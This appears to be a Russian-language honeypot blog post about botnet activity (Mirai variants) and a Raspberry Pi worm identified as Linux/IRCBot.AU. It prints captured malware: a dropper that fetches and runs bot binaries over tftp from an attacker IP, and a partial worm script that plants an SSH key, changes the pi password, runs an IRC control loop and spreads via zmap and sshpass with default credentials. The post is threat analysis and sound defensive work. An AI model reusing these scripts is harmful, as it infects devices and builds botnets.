Comments 1
Кибервойны, конфликты, бокс по удалёнке.
Начало событий в Украине с точки зрения Honeypot выглядит так
16 февраля активизировались ботнеты. Судя по информации Virustotal это разновидность Mirai.
Если до 16 февраля были такие себе одиночные пики мощных брутфорс-атак, то сейчас вот такая картина.
Географическое расположение - по всем странам, с использованием TOR.
Как работает:
После успешной атаки бот пытается загрузить скрипт по ссылкам вида:
http://IP-Addr/x/1sh
http://IP-Addr/x/2sh
http://IP-Addr/x/3sh
Скрипт в свою очередь загружает версии вредоноса под разные платформы:
Hidden text
#!/bin/bash
ulimit -n 1024
cp /bin/busybox /tmp/
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.x86 -g <IP-addr> ;cat uYtea.x86 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.mips -g <IP-addr> ;cat uYtea.mips >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.mpsl -g <IP-addr> ;cat uYtea.mpsl >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm -g <IP-addr> ;cat uYtea.arm >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm5 -g <IP-addr> ;cat uYtea.arm5 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm6 -g <IP-addr> ;cat uYtea.arm6 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm7 -g <IP-addr> ;cat uYtea.arm7 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.ppc -g <IP-addr> ;cat uYtea.ppc >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.m68k -g <IP-addr> ;cat uYtea.m68k >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.sh4 -g <IP-addr> ;cat uYtea.sh4 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.spc -g <IP-addr> ;cat uYtea.spc >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arc -g <IP-addr> ;cat uYtea.arc >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.x86_64 -g <IP-addr> ;cat uYtea.x86_64 >x ;chmod +x *;./x SSH.Selfrep
Так же, были замечены и другие модификации.
Пример используемых ссылок для загрузки:
ftp://anonymous:anonymous@IP/.sh
http://IP/onions1337
Функционал аналогичен.
Пользователи, пароли
15 самых популярных пользователей (данные за последний месяц)
Hidden text
15 самых популярных паролей (данные за последний месяц)
Hidden text
География (данные за последний месяц)
Выглядит всё это безобразие примерно вот так:
Hidden text
"Малинка" и желающие забраться в малинник.
Что касается атак именно на Raspberry Pi, явно отслеживается следующая штука.
Hidden text
Пароли
Hidden text
Скрипт не полный
C0755 4745 rbFCPCn5
#!/bin/bash
MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG
if [ "$EUID" -ne 0 ]
then
NEWMYSELF=`mktemp -u 'XXXXXXXX'`
sudo cp $MYSELF /opt/$NEWMYSELF
sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
sudo sh -c "echo 'exit 0' >> /etc/rc.local"
sleep 1
sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG
killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl
echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc
usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi
mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmE>
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx*
rm -rf /tmp/cpuminer-multi
rm -rf /var/tmp/kaiten
cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
-----END PUBLIC KEY-----
EOFMARKER
BOT=`mktemp -u 'XXXXXXXX'`
cat > /tmp/$BOT <<'EOFMARKER'
#!/bin/bash
SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do
arr[0]="ix1.undernet.org"
arr[1]="ix2.undernet.org"
arr[2]="Ashburn.Va.Us.UnderNet.org"
arr[3]="Bucharest.RO.EU.Undernet.Org"
arr[4]="Budapest.HU.EU.UnderNet.org"
arr[5]="Chicago.IL.US.Undernet.org"
rand=$[$RANDOM % 6]
svr=${arr[$rand]}
....
# Main loop
while [ true ]; do
eval "read msg_in <&3;"
if [[ ! "$?" -eq 0 ]] ; then
break
fi
if [[ "$msg_in" =~ "PING" ]] ; then
printf "PONG %s\n" "${msg_in:5}";
eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
sleep 1
eval 'printf "JOIN #biret\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
....
fi
done
done
EOFMARKER
....
NAME=`mktemp -u 'XXXXXXXX'`
date > /tmp/.s
apt-get update -y --force-yes
apt-get install zmap sshpass -y --force-yes
while [ true ]; do
FILE=`mktemp`
zmap -p 22 -o $FILE -n 100000
killall ssh scp
for IP in `cat $FILE`
do
sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $M>
sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKe>
done
rm -rf $FILE
sleep 10
done
....
Эта штука - Linux/IRCBot.AU (Eset NOD)
Довольно много развелось этого, судя по honeypot.
Исследование: чаще всего компрометируются учетные данные устройств Raspberry Pi и Linux